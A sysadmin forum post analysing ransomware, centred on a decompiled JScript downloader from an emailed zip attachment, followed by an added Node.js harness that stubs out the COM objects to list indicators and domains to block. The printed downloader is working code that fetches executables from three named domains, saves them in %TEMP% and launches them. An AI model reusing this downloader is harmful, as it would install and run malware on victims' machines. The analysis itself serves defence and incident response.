Topic: Malware and Ransomware - Protect FA Servers

This post is intended for SysAdmins who are responsible for the security of their (FA) installations and / or for monitoring their users' devices and activity for vulnerabilities.

An analysis of a WinXP machine revealed that uninstalling the adware "Junior Icon Editor" resulted in the installation and execution of ransomware. By the time the machine was rebooted into safe mode, the malware had already encrypted a host of files with txt, doc, zip, png and jpg extensions, renaming them with an additional .ccc extension, and was readying itself to create system-wide havoc by auto-starting on reboot. If the ransom note, dropped into practically every folder on the C drive as html and txt files, is to be believed, recovery is impossible, as the data are purported to be encrypted using a 2048-bit RSA cipher.

A recent article on the proliferation of ransomware on Linux servers raised the bar on datacenter protective security measures. Good business for "Cyber Security Consultants" indeed. Universities are jumping on the bandwagon by providing lucrative courses in this domain despite having no skills in this regard!

An email file attachment received was a zipped .js file. A Payload Security online scan of the attachment revealed no threat. The JS code had been split into snippets held in obfuscated variables, each wrapped in a function that returns its snippet; the functions were listed in a randomised order and their outputs concatenated to obtain the actual payload, which was then eval-ed. A semi-automated decompilation and tidying up resulted in the following:

// Start of Decompile
// cryptographic machine GUID, ability to look up the Windows account name, reads the active computer name
// Identifier the script sends to the download sites as the id= parameter (an encoded string)
var str="5552505E05140911100C11241117054A0A01105E3C5E070D100D1E010A4A070B094A0C0F5E17555E555050535654565055575E55";

// The three download sites; the original declared them as
// var b = "samiragallery.com lincolnracing.com alejandrosanchezvejar.com".split(" ");
var b = ["samiragallery.com", "lincolnracing.com", "alejandrosanchezvejar.com"];

var ws = WScript.CreateObject("WScript.Shell");          // shell: environment lookup and process launch
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "998317";   // 92 = "\", so %TEMP%\998317
var xo = WScript.CreateObject("MSXML2.XMLHTTP");         // HTTP client
var xa = WScript.CreateObject("ADODB.Stream");           // binary stream used to write the response to disk
var ld = 0;                                              // index of the last site that delivered; later rounds start there
for (var n = 1; n <= 3; n++) {                           // three download rounds: rnd=261811, 261812, 261813
    for (var i = ld; i < b.length; i++) {                // try each site in turn until one delivers
        var dn = 0;
        try {
            xo.open("GET", "http://" + b[i] + "/counter/?id=" + str + "&rnd=26181" + n, false); xo.send();   // synchronous GET
            if (xo.status == 200) {
                xa.open();
                xa.type = 1;                             // adTypeBinary
                xa.write(xo.responseBody);
                if (xa.size > 1000) {                    // anything shorter is treated as an error page, not a payload
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn + n + ".exe", 2);   // adSaveCreateOverWrite: %TEMP%\998317<n>.exe
                    try {
                        ws.Run(fn + n + ".exe", 1, 0);   // launch it: normal window, do not wait for it to exit
                    } catch (er) { };
                };
                xa.close();
            };
            if (dn == 1) {
                ld = i;                                  // remember the working site and move on to the next round
                break;
            };
        } catch (er) { };                                // a dead site is silently skipped
    };
};

//         function b3(){return eval;};
//         b3()(v6);
// commented out for safety
// eval(v6);

// End of Decompile

On executing the xo.open GET URL against any of the 3 sites listed in the code above, a malicious binary is streamed onto the system, saved into %TEMP% as an exe file and launched; the Linux variation isn't hard to fathom.

The first malicious site in the code is registered through GoDaddy.com with domain privacy enabled. Sucuri SiteCheck lists it as "Infected". VirusTotal lists the last few accesses, which show the same URL template as in the code above.
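What the downloader would do on a victim, and which hosts it would contact, can be enumerated offline by running the decompiled script with WScript.CreateObject handing back stub objects that log instead of acting. The block below is an added example (Node.js), not code from the attachment or from the original post. The embedded script is the decompiled downloader from above with its array declaration made valid; the victim's %TEMP% path, the fake 2,000-byte response and the serverUp switch are constructed assumptions standing in for a live or dead download site.

```javascript
// Added example (Node.js): enumerate what the decompiled downloader would do on a victim by
// running it with WScript.CreateObject handing back stub objects that log instead of acting.
// DOWNLOADER_SOURCE is the decompiled script from above with the array declaration made valid;
// the %TEMP% path, the fake 2,000-byte response and the serverUp switch are constructed assumptions.
const DOWNLOADER_SOURCE = `
var str = "5552505E05140911100C11241117054A0A01105E3C5E070D100D1E010A4A070B094A0C0F5E17555E555050535654565055575E55";
var b = "samiragallery.com lincolnracing.com alejandrosanchezvejar.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "998317";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
  for (var i = ld; i < b.length; i++) {
    var dn = 0;
    try {
      xo.open("GET", "http://" + b[i] + "/counter/?id=" + str + "&rnd=26181" + n, false); xo.send();
      if (xo.status == 200) {
        xa.open(); xa.type = 1; xa.write(xo.responseBody);
        if (xa.size > 1000) {
          dn = 1; xa.position = 0; xa.saveToFile(fn + n + ".exe", 2);
          try { ws.Run(fn + n + ".exe", 1, 0); } catch (er) {}
        }
        xa.close();
      }
      if (dn == 1) { ld = i; break; }
    } catch (er) {}
  }
}`;

const FAKE_TEMP = 'C:\\Users\\victim\\AppData\\Local\\Temp';   // assumed victim profile path

// Execute `source` against logging stand-ins for the three COM objects it creates.
// serverUp=true answers every GET with a fake >1000-byte body (the success path);
// serverUp=false makes every GET throw, as a dead or sinkholed site would (the retry path).
function emulateDownloader(source, serverUp) {
  const log = { progIds: [], urls: [], files: [], runs: [] };
  const shell = {
    ExpandEnvironmentStrings: (s) => s.replace(/%TEMP%/g, FAKE_TEMP),
    Run: (cmd) => { log.runs.push(cmd); return 0; },
  };
  const http = {
    status: 0, responseBody: '',
    open(_method, url) { log.urls.push(url); this.status = 0; },
    send() {
      if (!serverUp) throw new Error('connection failed');
      this.status = 200;
      this.responseBody = 'MZ' + '\0'.repeat(2000);   // constructed stand-in for a PE download
    },
  };
  const stream = {
    type: 0, size: 0, position: 0, buf: '',
    open() {}, close() {},
    write(data) { this.buf = data; this.size = data.length; },
    saveToFile(path) { log.files.push(path); },
  };
  const objects = { 'WScript.Shell': shell, 'MSXML2.XMLHTTP': http, 'ADODB.Stream': stream };
  const WScript = {
    CreateObject(progId) {
      log.progIds.push(progId);
      if (!(progId in objects)) throw new Error('unstubbed ProgID ' + progId);  // anything else deserves a look
      return objects[progId];
    },
  };
  new Function('WScript', source)(WScript);
  return log;
}

// Distinct hosts contacted, i.e. the proxy / DNS blocklist this sample yields.
function blocklist(log) {
  return [...new Set(log.urls.map((u) => new URL(u).hostname))];
}

console.log('sites up:  ', emulateDownloader(DOWNLOADER_SOURCE, true));
console.log('sites down:', blocklist(emulateDownloader(DOWNLOADER_SOURCE, false)));
```

With every site dead the script walks all three sites in each of its three rounds, which yields the full domain list to block; with a site answering it stops at the first one and shows the three files dropped into %TEMP% and launched. The host indicator to hunt for is therefore %TEMP%\998317<n>.exe, and the network indicator is the /counter/?id=...&rnd=26181<n> URL template, regardless of which of the three domains served it.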

Standard Operating Procedures of Criminal conglomerates, geeky script kiddies, "Rogue" nations security apparatus, "Penetration testing" masquerades, ...... highest bidder ...... monopolisers...... Security / Anti-Virus corporates.....